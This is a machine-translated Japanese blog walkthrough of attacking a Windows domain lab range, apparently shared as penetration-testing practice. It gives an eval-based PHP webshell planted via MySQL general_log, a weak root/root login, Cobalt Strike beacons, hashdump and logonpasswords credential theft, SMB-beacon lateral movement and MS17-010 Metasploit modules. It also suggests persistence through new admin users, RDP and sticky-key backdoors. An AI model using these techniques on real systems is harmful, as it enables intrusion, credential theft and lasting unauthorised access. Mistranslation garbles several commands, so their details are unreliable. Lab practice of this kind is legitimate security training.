Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86369695

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x00はじめに

以前は、ドメイン環境を使用していたとき、ドメインのホストはネットワークを離れませんでした。当時、ソックスプロキシは、ネットワークホストをエッジホストに残さなかったトラフィックをプロキシに使用していました。当時、私はそれについてあまり考えていませんでした。私が降りた後、私はその時点で状況を再現するために環境を設定し、インストールできないホストを構築するより簡単な方法があるかどうかを確認することを考えました。

たまたま、このドメインの環境はかなり良いことがわかりました。複製プロセス中、いくつかの知識が私の知識の盲点に触れ、多くの新しい知識を獲得しました。私はプロセスを特別に記録し、ドメインにネットワークホストの構築を学びたいマスターと共有しました。

0x01範囲アドレス割り当て

イントラネットセグメント:192.168.52.0/24

外部ネットワークセグメント:192.168.10.0/24

攻撃航空機:

Kali:192.168.10.11

範囲:

Win7(内部):192.168.52.143

Win7(外部):192.168.10.15

ドメインホスト:

winserver2003:192.168.52.141

winserver2008:192.168.52.138

その中で、Win7は外部ネットワークとイントラネットと通信でき、ドメインのホストはイントラネット間でのみ通信できます。

1049983-20220124163901746-2144489756.png 1049983-20220124163902189-1458240487.png 1049983-20220124163902594-1519777036.png

当初、DCPINGはWIN7で動作しません。ファイアウォールを閉じた後、PINGできます。

1049983-20220124163903004-1338279191.png

cドライブの下でphpstudyディレクトリを開くためにWebサービスを開く

1049983-20220124163903593-149325616.png

0x02 Webサーバーの侵入

nmapプローブポート

NMAP -SS -P0 -SV -O 192.168.10.15 1049983-20220124163906230-936810712.png

ポート80を開き、Webアドレスにアクセスしようとしましたが、PHPプローブであることがわかりました

1049983-20220124163906836-164637923.png

下部にスライドして、Webサイトの下部にMySQLデータベース接続検出を見つけます

1049983-20220124163907375-846620892.png

弱いパスワードルート/ルート接続が成功しました

1049983-20220124163907838-986737968.png

背景をスキャン

私はここで剣を使用しますが、この射撃範囲を撮影し終えた後、それらの多くがCMSをスキャンしていることを確認するためにオンラインになったので、それは非常に難しいようです。弱いCMSパスワードを使用して背景を入力してシェルを書き込む方法を示しません。興味があれば、自分で検索できます。

1049983-20220124163908277-241425413.png

phpmyAdminディレクトリがあるか、ルート/ルートログインの弱いパスワードが成功していることがわかりました

1049983-20220124163908735-1590975810.png

入力後のインターフェイスは次のとおりです

1049983-20220124163909352-372133666.png

0x03 phpmyadminを介してシェルを書き込み

phpmyadminを介してシェルを書く方法は2つあります

最初に、Outfileに直接選択するように書き込もうとしましたが、ここのSecure_file_privの値はnullであるため、特権を提起することはできません。

1049983-20220124163909862-667465136.png

別の方法のみを使用し、グローバルログを使用してシェルを書き込みます

「%一般%」のような変数を表示

構成を確認すると、グローバルログが閉じた状態にあることがわかります。 general_log_fileは、ログの絶対アドレスを返します。

1049983-20220124163910268-1724805009.png

次に、最初にそのグローバルログを開き、次にその道にトロイの木馬を書きます

グローバルgeneral_log=on;

1049983-20220124163910682-1879618747.png

グローバルログを開いた後、絶対パスを変更します。ここにピットがあることに注意してください。ログによって返されるパスはC: \\ phpstudy \\ mysql \\ data \ stu1.logですが、mysqlがアクセスする絶対アドレスはc: \\ wwwディレクトリです。

グローバルgeneral_log_file='c: \\ phpstudy \\ www \\ shell.php';

1049983-20220124163911142-676987047.png

これが別の文のトロイの木馬です

'?php eval($ _ post [cmd]);'を選択します

1049983-20220124163911549-1659420760.png

次に、アリの剣をつなぎます

1049983-20220124163911903-1002772197.png

接続が成功していることがわかります

1049983-20220124163912348-1706029029.png

0x03イントラネット情報コレクション

システム許可を確認してください。開始したらすぐに管理者の権限を確保するのは非常に快適です

1049983-20220124163912724-972833949.png

ipconfig /すべてのネットワーク情報を表示、ドメイン環境+デュアルネットワークカード

1049983-20220124163913157-1401831141.png

1049983-20220124163913516-1835974496.png

TaskList /SVCはそれを一時的に見て、イカのようなものはないように思われました。

1049983-20220124163914007-273676775.png

ソフトソフトの殺害はないと考えて、CSによって生成されたTrojan Exeをターゲットホストにアップロードするために、最もシンプルでCrudest CSを使用する方が簡単です。

1049983-20220124163914407-1971344544.png

計画されたタスクを使用してオンラインcsにアクセスします

1049983-20220124163914832-1750744115.png

正常に起動しました

1049983-20220124163915243-66467728.png

0x04イントラネット浸透

情報収集

ネットビュードメイン情報

1049983-20220124163915628-1443883904.png

CSSが提供するポートを使用して、ホストの波をスキャンします

1049983-20220124163916046-1924451041.png

次のようにすべてのホストをスキャンします

1049983-20220124163916412-1448650307.png

ハッシュダンプハッシュの波をキャッチします

1049983-20220124163916769-803218867.png

logonpasswordsは、平易なテキストの波をキャプチャします

1049983-20220124163917209-1566886515.png

すべての資格情報は次のとおりです。コーディングの理由は、前にログインするときにパスワードがリセットされたため、個人情報でパスワードを取得したことです。

1049983-20220124163917586-1840235401.png

考え

ターゲットホストにはファイアウォールが有効になっていないため、ここでテストしました。CSSで構築されたPSEXECを使用して、ドメインコントロールとコンピューターパスワードを水平方向にキャプチャできます。ただし、Win7デュアルネットワークカードやドメイン内の他のホストがネットワークを離れることができない状況を考えると、ホストから抜け出さない方法を練習してください。

一般に、インターネットなしでオンラインに行く方法は次のとおりです。

SMBビーコンを使用して、httpプロキシを介してオンラインでリスナーを構成するpystingerを使用してsmbビーコンメソッドを使用します

SMB

ビーコンは、名前のパイプを使用して、親のビーコンを介して通信します。 2つのビーコンがリンクされると、子供のビーコンは親のビーコンからタスクを取得し、それを送信します。リンクされたビーコンは通信にパイプという名前のウィンドウを使用しているため、このトラフィックはSMBプロトコルにカプセル化されているため、SMB

ビーコンは比較的隠されています。 SMBビーコンは、利用可能な負荷を直接生成することはできません。PSEXECまたはStagelessペイロードを使用してのみ起動できます。

まず、イントラネットのホストのビーコンを取得し、パスワードをつかんでSMBインジェクションを実行し、オープンポート445を使用して別のマシンで管理者アカウントパスワードを取得します。ターゲットマシンがネットワークを離れない場合は、SMBを使用できます

ビーコンはターゲットホストをオンラインでもたらします

1049983-20220124163918064-935605408.png

1。使用条件

SMBビーコンのホストは、ポート445の接続を受け入れる必要があります。同じコバルトストライクインスタンスによって管理されたビーコンへのリンクのみ。このビーコンの水平ムーブメントを使用するには、ターゲットホストに管理者の権利を持つ管理者の権利または資格情報が必要です。 2。使い方

(1)SMBリスナーを作成します

1049983-20220124163918542-2065634361.png

(2)水平方向の動きのためにCSでPSEXECを使用し、既存のビーコンをスプリングボードとして選択します。資格情報は管理者でなければなりません

、つまり、ターゲットホスト管理者の特権を持っています

1049983-20220124163918984-1708931929.png

(3)接続が成功し、SMBビーコンのホストの右側に∞∞ロゴがあることがわかります

この方法を使用して、主にネットワーク発信機を介してオンラインで中間としてオンラインで行くマシン。ネットワークのないホストが正常に起動された後、ネットワークのないホストが切断された場合、ネットワークのないホストも切断されます。

1049983-20220124163919345-1490915206.png

0x05イントラネット水平浸透

考え

ラドンを使用してイントラネットの永遠の青をスキャンし、これらのホストがすべてMS17-010を持っていることがわかります

1049983-20220124163919760-922662305.png

MS17010をプレイするいくつかの一般的な方法:

MSFLADON/LADON_MS17010 MSFから分離されたExessusでこれらの幹部プラグインの方法を試しました。私はプロセスについて一つずつ説明することはありません、私のテストの結果について話してください

MSFは最も安定していますが、監視モジュールをセットアップして攻撃モジュールを選択する必要があるため、戦うのは少し面倒です。 ladon_ms17010は便利ですが、あまり安定していない場合があります。 CSSプラグインは安定しておらず、ネットワークがネットワークなしで安定していない場合、成功率は低くなります。

ネットワークを離れないこの場合、MSFとHITに分離されたEXEとLADON_MS17010を使用することを優先することができます。成功裏に、カスタムDLLを介して新しいユーザーが作成され、管理者グループに参加し、ポート3389を開き、粘着性のあるキーバックドアが残ります。

実際の状況に応じて、適切な期間と条件の下で直接リモートでログインし、機密データをめくることを検討することができます。これは、「パスワードbook.txt」などの運用および保守担当者の多くの「良い習慣」により、多くの侵入に多くの利便性をもたらすことがよくあります。

cs派生MSFセッション

MSFはリスニングポートを設定します

1049983-20220124163920416-31141225.png

新しいポートを作成して会話を作成します

1049983-20220124163920944-1939505415.png

MeterPreterを取得するために実行します

1049983-20220124163921365-1291046948.png

ms_17_010ドメイン制御権限を取得

ここでは、DCがMS_17_010の脆弱性を持っていることを知っているので、最初にEternal Blueを使用してヒットしようとしました。

次のモジュールを使用します

Exploit/Windows/SMB/MS17_010_ETERNALBLUE 1049983-20220124163922189-1365242399.png

実行後、EXPがヒットしたことがわかりましたが、セッションは確立されていません

1049983-20220124163922999-380152774.png

MS17010モジュールを変更します

Exploit/Windows/SMB/MS17_010_PSEXECを使用します

ペイロードWindows/MeterPreter/lind_tcp 1049983-20220124163923559-2136735050.pngを設定します

シェルも手に入れませんでした。当時は注意深く考えていませんでした。後で、Win7が2つのネットワークセグメントにあったためである可能性があると考えたので、Eternal Blueに直接ぶつかることでシェルを取得できませんでした。

1049983-20220124163923989-1404717762.png

MSFは、ネットワークマシンのMS_17_010

を出力できません

以前にMeterPreterをMeterPreterを入手することを考えたので、ルートを追加して試してみました

MSFは、単独で戦うとき、まだ非常に安定しており、香りがあります。 Win7がMSFで発売された後、私たちはすでに5つあることを事前に知っていました